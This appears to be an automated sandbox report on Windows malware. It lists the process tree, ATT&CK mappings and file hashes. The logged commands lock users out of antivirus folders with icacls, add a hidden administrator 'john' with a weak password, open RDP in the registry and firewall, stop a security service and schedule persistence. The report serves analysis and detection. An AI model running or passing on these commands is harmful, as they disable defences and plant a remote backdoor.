- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2808
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4284
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4260
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1864
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:2344
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4996
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
      4⤵
      PID:4380
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1672
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4728
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
  2⤵
  PID:4792
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:392
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2248
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:5104
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3156
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4404
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4348
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:1748
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4244
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4136
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1744
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4740
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2084
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3400
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4128
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5100
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:624
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
    3⤵
    PID:3960
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4640
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4356
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
  2⤵
  PID:1412
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1084
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2312
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2152
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
  2⤵
  PID:1580
- C:\ProgramData\RealtekHD\taskhostw.exe
  C:\ProgramData\RealtekHD\taskhostw.exe
  2⤵
  PID:5096

C:\Windows\SysWOW64\regedit.exe
regedit /s "reg1.reg"
1⤵
- Runs .reg file with regedit
PID:3960

C:\Windows\SysWOW64\regedit.exe
regedit /s "reg2.reg"
1⤵
- Runs .reg file with regedit
PID:3184

C:\Windows\SysWOW64\timeout.exe
timeout 2
1⤵
- Delays execution with timeout.exe
PID:2424

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
PID:944
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe
  2⤵
  PID:4900
- - C:\ProgramData\Windows\rfusclient.exe
    C:\ProgramData\Windows\rfusclient.exe /tray
    3⤵
    PID:4572
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe /tray
  2⤵
  PID:1720

C:\Windows\SysWOW64\sc.exe
sc stop bytefenceservice
1⤵
PID:404

C:\Windows\SysWOW64\sc.exe
sc config appmgmt start= auto
1⤵
PID:1240

C:\ProgramData\Microsoft\Intel\taskhost.exe
"C:\ProgramData\Microsoft\Intel\taskhost.exe"
1⤵
PID:2460
- C:\programdata\microsoft\intel\R8.exe
  C:\programdata\microsoft\intel\R8.exe
  2⤵
  PID:1228
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
    3⤵
    PID:4208
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
      4⤵
      PID:2876
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:4100
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        5⤵
        Kills process with taskkill
        
        PID:1484
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:1412
    - - C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        5⤵
        
        PID:1232
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        5⤵
        Kills process with taskkill
        
        PID:4728
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        5⤵
        Delays execution with timeout.exe
        
        PID:1000
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        5⤵
        Delays execution with timeout.exe
        
        PID:4244
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        5⤵
        
        PID:3684
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
        6⤵
        
        PID:2320
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        7⤵
        
        PID:1112
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        7⤵
        
        PID:4100
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        7⤵
        
        PID:208
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        7⤵
        
        PID:3336
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        8⤵
        
        PID:2264
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        7⤵
        
        PID:3752
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Администраторы" "John" /add
        7⤵
        
        PID:344
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administratorzy" "John" /add
        7⤵
        
        PID:3536
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
        8⤵
        
        PID:1980
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" John /add
        7⤵
        
        PID:4664
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        7⤵
        
        PID:3512
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного управления" John /add
        7⤵
        
        PID:624
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        7⤵
        
        PID:4996
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administradores" John /add
        7⤵
        
        PID:4276
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Uzytkownicy pulpitu zdalnego" John /add
        7⤵
        
        PID:3656
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
        8⤵
        
        PID:1756
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -i -o
        7⤵
        
        PID:4732
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        8⤵
        
        PID:4296
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Usuarios de escritorio remoto" John /add
        7⤵
        
        PID:4984
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -w
        7⤵
        
        PID:928
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        7⤵
        
        PID:432
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
        7⤵
        
        PID:3612
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
  2⤵
  PID:3608
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
  2⤵
  - Creates scheduled task(s)
  PID:3772

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
1⤵
- Kills process with taskkill
PID:1196

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
1⤵
- Modifies file permissions
PID:4848

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
1⤵
- Modifies file permissions
PID:4356

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
1⤵
- Modifies file permissions
PID:1000

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
1⤵
- Modifies file permissions
PID:4416

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
1⤵
- Modifies file permissions
PID:5096

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
1⤵
- Modifies file permissions
PID:3928

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
1⤵
- Modifies file permissions
PID:4460

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
1⤵
- Modifies file permissions
PID:1980

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
1⤵
- Modifies file permissions
PID:3348

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
1⤵
- Modifies file permissions
PID:3212

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
1⤵
- Modifies file permissions
PID:4104

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
1⤵
- Modifies file permissions
PID:2616

C:\Windows\SysWOW64\timeout.exe
timeout 5
1⤵
- Delays execution with timeout.exe
PID:640

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
1⤵
PID:4420

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
1⤵
PID:5100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
1⤵
PID:5060

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
1⤵
PID:2836

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
1⤵
PID:1440

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:3160

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /maxpwage:unlimited
1⤵
PID:1744

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Account Manipulation

T1098

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Winlogon Helper DLL

T1004

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Hidden Files and Directories

Impair Defenses

Modify Registry

Web Service

Credential Access

Account Manipulation

T1098

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\RDP Wrapper\rdpwrap.dll

Filesize
114KB

MD5
461ade40b800ae80a40985594e1ac236

SHA1
b3892eef846c044a2b0785d54a432b3e93a968c8

SHA256
798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

SHA512
421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Download Submit
C:\ProgramData\Microsoft\Intel\R8.exe

Filesize
887KB

MD5
ad95d98c04a3c080df33ed75ad38870f

SHA1
abbb43f7b7c86d7917d4582e47245a40ca3f33c0

SHA256
40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd

SHA512
964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

Download Submit
C:\ProgramData\Microsoft\Intel\taskhost.exe

Filesize
2.9MB

MD5
27d20230183aa02f549b29d55333a337

SHA1
40457e02ce8f806648a419cebcf312f74821ac8b

SHA256
d32d785f011d04ecf0a31dd26ce1a90af1522bba11918902b4e72ec454139184

SHA512
eb5cb3efcde54db2b99f0a3d74608e1b6c2e6c074dd771fe9c37dfacf63fd44595740effba10037551fd91010b44b9a7e518d47f740aed6f8622a01a6800eddc

Download Submit
C:\ProgramData\Microsoft\Intel\taskhost.exe

Filesize
3.4MB

MD5
21051153941af9ee557af2f3c28a0f37

SHA1
28094ccf085627df598b5379f9b4543c9801f595

SHA256
60b4921054fa09079c19e1c9f9744c22dcf581e7c9ca58abc02417f360af5387

SHA512
af0b0f56ddb1c590aa00a6de42d1ccf0ea168d48bb93b61e4e5117d3ad74620a74eb848c4a024c6f2ae3ca788bc883eed9c7cf08cf2e7890345ee7e943931ba4

Download Submit
C:\ProgramData\Microsoft\Intel\wini.exe

Filesize
803KB

MD5
bc8c48353ed6a726117047bce9bbbb00

SHA1
9403a676cff031a078a9fb5e409d628eca1e439d

SHA256
03176e7adec6edfd07edaa77f1822181601089373b40461516f67093d50503d9

SHA512
f396cc80f4f5039a5f1b7ee8566a7a5fdb6863e2ebdf7f65b1c255e88c7a9f1ff62b775d03f69bd8f5bd1d29fff9dd9706154fdf16ab5a66982a02202913d14e

Download Submit
C:\ProgramData\Microsoft\Intel\wini.exe

Filesize
708KB

MD5
3d4bdeb941441dd63c879b3fe4720415

SHA1
ce80de0593b0583bb4efedc5ed7d62c2a9d5a8be

SHA256
a0ca7b4a30f3925a791244b9a1bdd8eb04996d3be2cd344eee43ceaa19765272

SHA512
ab8ceb692e993df0f4c6d75d66a5cc2ae7530c58855bc64fb9a0e5507425783c1391f7260f74bbe35b18afde7978f71ec018e4b8a56ff18f1f56b984affc09cd

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Filesize
411KB

MD5
e41e77b94ab7a625c3c2e51c4a757dc6

SHA1
c929e4ae7c456dd2324dc6609036558fa08c990e

SHA256
23adf8813caba9f7c2a46b0748c3e490bd6aa8fb695e4239a30439b46ae969cc

SHA512
fda7be698671ec16401caef1a62fede60bef4d0e858cbf9fbebaa0e8d8697f43c9b73b8cd5a029d9a9c56fb78ada58d7e64b04b88a725b5b8bf188ab777c914f

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Filesize
64KB

MD5
7b2f9fe0af36de43d9041469ec21b22f

SHA1
3d0532afb09545ddc033ee2f558fbd40a57691ba

SHA256
f4a8a80ffc7ccb45de8ed336ee60a4ab0756f1bd640d945b4b42fcd3e5d33731

SHA512
44e9bc17d12605d56713add26a32ece2fcf8f12ce93e8f21079fe6f32c1c37360db3f51d99845c4404c7db41983a72697682f0f7255a357e401b7c67bb6669cd

Download Submit
C:\ProgramData\Windows\install.vbs

Filesize
140B

MD5
5e36713ab310d29f2bdd1c93f2f0cad2

SHA1
7e768cca6bce132e4e9132e8a00a1786e6351178

SHA256
cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931

SHA512
8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1

Download Submit
C:\ProgramData\Windows\reg1.reg

Filesize
13KB

MD5
0bfedf7b7c27597ca9d98914f44ccffe

SHA1
e4243e470e96ac4f1e22bf6dcf556605c88faaa9

SHA256
7e9541d21f44024bc88b9dc0437b18753b9d9f22b0cf6e01bb7e9bf5b32add9e

SHA512
d7669937f24b3dbb0fdfd19c67d9cdbd4f90779539107bd4b84d48eab25293ef03661a256fe5c662e73041b1436baff0570ace763fa3effa7c71d954378cbc2d

Download Submit
C:\ProgramData\Windows\reg2.reg

Filesize
1KB

MD5
6a5d2192b8ad9e96a2736c8b0bdbd06e

SHA1
235a78495192fc33f13af3710d0fe44e86a771c9

SHA256
4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a

SHA512
411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d

Download Submit
C:\ProgramData\Windows\rfusclient.exe

Filesize
1.5MB

MD5
b8667a1e84567fcf7821bcefb6a444af

SHA1
9c1f91fe77ad357c8f81205d65c9067a270d61f0

SHA256
dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

SHA512
ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

Download Submit
C:\ProgramData\Windows\rfusclient.exe

Filesize
1.5MB

MD5
b8667a1e84567fcf7821bcefb6a444af

SHA1
9c1f91fe77ad357c8f81205d65c9067a270d61f0

SHA256
dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

SHA512
ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

Download Submit
C:\ProgramData\Windows\rfusclient.exe

Filesize
1.5MB

MD5
b8667a1e84567fcf7821bcefb6a444af

SHA1
9c1f91fe77ad357c8f81205d65c9067a270d61f0

SHA256
dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

SHA512
ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

Download Submit
C:\ProgramData\Windows\rfusclient.exe

Filesize
923KB

MD5
1c4d4a105a632ef81ecc3f67814e4733

SHA1
d6b8f24ddf9d00a7d9e46b765cf19a6a24f0c71f

SHA256
1d4c7b4b7e4641bef9754a994e152bf12044eae8dfd7142a0e9a0bcd5017f21b

SHA512
d3a993af521dc501009d1ea04038871a07d624360ae51ea65981756fd2397333cc036b317b11a1e4672abc795b9b0f712eea14624c6d264c288703430001839d

Download Submit
C:\ProgramData\Windows\rutserv.exe

Filesize
753KB

MD5
16d451e44f08856d548d718ff61d3f8c

SHA1
fee058a1505c89ab643104d4cc553c4244571829

SHA256
08b127a4811b8f8e4185c72666187aee9917ec5c3886dd95caff258636f09c9f

SHA512
0a25897a7d7200a46258d7603efcf34720f05649181feb25d75e8c387a41599fca93fca492536734fce99358e5910147916fe89670c0d963522a06f4a37af6ed

Download Submit
C:\ProgramData\Windows\rutserv.exe

Filesize
1.7MB

MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe

Filesize
1.7MB

MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe

Filesize
1.7MB

MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe

Filesize
1.7MB

MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\vp8decoder.dll

Filesize
155KB

MD5
88318158527985702f61d169434a4940

SHA1
3cc751ba256b5727eb0713aad6f554ff1e7bca57

SHA256
4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74

SHA512
5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

Download Submit
C:\ProgramData\Windows\vp8encoder.dll

Filesize
593KB

MD5
6298c0af3d1d563834a218a9cc9f54bd

SHA1
0185cd591e454ed072e5a5077b25c612f6849dc9

SHA256
81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172

SHA512
389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

Download Submit
C:\ProgramData\Windows\winit.exe

Filesize
824KB

MD5
8cfb66f5a59ee03835ddd3234fd8779d

SHA1
e7d9685d3646a6b8698ad399bc683f4c4086ff49

SHA256
44ac86d43787661055c29c113728072214195850ed94aef538cdeac1b3e7de63

SHA512
7e8eec9a2e2e579566c0c0de06b2104122dde2628dbce274fc81c0cd4358fbaf20cbdbc8a977b38d980d43e12ceffb04beb31ee3fef2b06caba6bbe35d4ca098

Download Submit
C:\ProgramData\Windows\winit.exe

Filesize
961KB

MD5
705e63ba28d331a481a5e9833c67d426

SHA1
22ed4fd1fb0f2fd7e93d0517667c8876af5d004c

SHA256
a55d1809ec80b41d510186eddd9bb4e787c9a1f1460418eaed2a61bfbfa5d1e7

SHA512
dcc8d749dd632dfae7f2b63e075485a6bfde7d811bff0c10dd2f6b78e9b7b7a94926a0c558f0d4fb4c8cf04e74be9ccbfeddc533693dcddea879b2ca9d70bb3f

Download Submit
C:\ProgramData\install\cheat.exe

Filesize
923KB

MD5
b2f7e2cd92e956f87648922afd2039ff

SHA1
c380dc08b8dc8de43dd5463c223f2257da1a7a39

SHA256
f4b14ede5477caf59541335ae66577316136ceded78a0ea700e0d03ab371c68b

SHA512
8a16c8b40e61a1268d50815ba9946d12f25dc0ec216179c0299c5e2af6e766c0729175e27f655f48714044c2198b21a5a8dd06aebdb49600f3fe452892f35c3b

Download Submit
C:\Programdata\Install\del.bat

Filesize
61B

MD5
398a9ce9f398761d4fe45928111a9e18

SHA1
caa84e9626433fec567089a17f9bcca9f8380e62

SHA256
e376f2a9dda89354311b1064ea4559e720739d526ef7da0518ebfd413cd19fc1

SHA512
45255ffea86db71fcfcde1325b54d604a19276b462c8cca92cf5233a630510484a0ecb4d3e9f66733e2127c30c869c23171249cfac3bb39ff4e467830cd4b26b

Download Submit
C:\Programdata\Windows\install.bat

Filesize
418B

MD5
db76c882184e8d2bac56865c8e88f8fd

SHA1
fc6324751da75b665f82a3ad0dcc36bf4b91dfac

SHA256
e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a

SHA512
da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04

Filesize
471B

MD5
df596400231f22799e39eae68352eb4f

SHA1
